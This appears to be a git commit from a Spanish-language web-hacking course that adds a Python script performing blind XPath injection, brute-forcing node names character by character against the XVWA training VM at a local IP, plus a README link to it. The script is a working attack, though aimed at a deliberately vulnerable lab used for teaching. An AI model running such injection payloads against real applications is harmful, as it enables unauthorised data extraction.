Update tema 6

This commit is contained in:
Manuel Vergara 2024-02-25 18:59:04 +01:00
parent 4f4428a390
commit b705ffba31
2 changed files with 70 additions and 0 deletions

View File

@ -0,0 +1,69 @@
#!/var/bin/env python
import pdb
import requests
import signal
import string
import sys
import time
from pwn import *
# Ctrl-C handler
def signal_handler(signal, frame):
print('\n\n[!] Ctrl-C. Saliendo...')
sys.exit(1)
signal.signal(signal.SIGINT, signal_handler)
# Variables globales
main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
characters = string.ascii_letters
def xPathInjection():
data = ""
p1 = log.progress("Inyeccion XPath")
p1.status("Iniciando ataque de fuerza bruta")
time.sleep(2)
p2 = log.progress("Data")
for position in range(1, 8):
for character in characters:
# post_data = {
# 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
# 'submit': ''
# }
post_data = {
'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
'submit': ''
}
r = requests.post(main_url, data=post_data)
if len(r.text) != 8686:
data += character
p2.status(data)
break
p1.success("Inyeccion XPath completada")
p2.success("Data: %s" % data)
if __name__ == "__main__":
xPathInjection()

View File

@ -39,6 +39,7 @@ Para protegerse contra las vulnerabilidades de XPath, es importante validar toda
A continuación, se proporciona el enlace directo de descarga a la máquina XVWA 1 de Vulnhub, la cual usamos en esta clase para explotar las vulnerabilidades existentes en XPath: A continuación, se proporciona el enlace directo de descarga a la máquina XVWA 1 de Vulnhub, la cual usamos en esta clase para explotar las vulnerabilidades existentes en XPath:
- XVWA 1: https://www.vulnhub.com/entry/xtreme-vulnerable-web-application-xvwa-1,209/ - XVWA 1: https://www.vulnhub.com/entry/xtreme-vulnerable-web-application-xvwa-1,209/
- script Python [xpath_injection.py](./26_xpath/xpath_injection.py)
## 6.27 Insecure Direct Object Reference (IDORs) ## 6.27 Insecure Direct Object Reference (IDORs)